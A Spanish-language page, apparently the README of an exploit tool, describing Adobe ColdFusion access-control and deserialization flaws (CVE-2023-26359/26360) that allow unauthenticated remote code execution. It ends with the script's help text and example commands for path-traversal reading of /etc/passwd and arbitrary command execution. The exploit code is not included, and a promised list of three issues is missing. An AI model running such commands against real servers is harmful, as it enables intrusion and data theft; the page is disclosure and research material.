
El 8 de marzo de 2023, Adobe publicó actualizaciones de seguridad para abordar vulnerabilidades críticas en Adobe ColdFusion, una plataforma popular de desarrollo de aplicaciones web. Estas vulnerabilidades, clasificadas como control de acceso inadecuado y deserialización insegura, conducen a una ejecución remota de código (RCE) no autorizada cuando un atacante envía una solicitud especialmente diseñada que contiene datos no confiables a un servidor ColdFusion.
La explotación no requiere interacción del usuario, lo que la hace particularmente grave, ya que permite a los atacantes ejecutar código arbitrario en el contexto del usuario actual sin que este lo sepa.
La Agencia de Seguridad de Infraestructura y Ciberseguridad (CISA) destacó la gravedad de este problema el 5 de diciembre de 2023, mediante la publicación de un aviso sobre la explotación activa de estos problemas. Señalaron que esta vulnerabilidad está siendo utilizada por actores de amenazas cibernéticas para obtener acceso inicial a los servidores web Adobe ColdFusion expuestos públicamente. La vulnerabilidad más grave tiene una puntuación CVSS de 9.8, lo que la clasifica como Crítica.
Así que, básicamente, después de una investigación adicional, se identificaron tres problemas diferentes:
Este script de exploit está escrito para un análisis de CVE en vsociety.
Ayuda:
usage: exploit.py [-h] --host HOST [--read-file READ_FILE] [--cmd CMD] [--endpoint ENDPOINT] [--win] [--proxy PROXY]
Exploit script for remote file read or command execution against Adobe ColdFusion (CVE-2023-26359, CVE-2023-26360, and CVE-2023-26359).
options:
-h, --help show this help message and exit
--host HOST Target host URL
--read-file READ_FILE, -f READ_FILE
File path to read from the host
--cmd CMD, -c CMD Command to execute on the target
--endpoint ENDPOINT Endpoint URL
--win Specify this if the target host is considered to be Windows.
--proxy PROXY Proxy URL
# Arbirary file read
python3 exploit.py --host http://localhost:8500 --read-file '../../../../etc/passwd'
# RCE
python3 exploit.py --host http://localhost:8500 --cmd 'CMD'
Este script de exploit ha sido creado únicamente con fines de investigación y para el desarrollo de técnicas defensivas eficaces. No está destinado a ser utilizado para actividades maliciosas o no autorizadas. El autor y el propietario del script declinan toda responsabilidad o culpa por cualquier mal uso o daño causado por este software. Se insta a los usuarios a utilizar este software de manera responsable y únicamente de acuerdo con las leyes y regulaciones aplicables. Úselo responsablemente.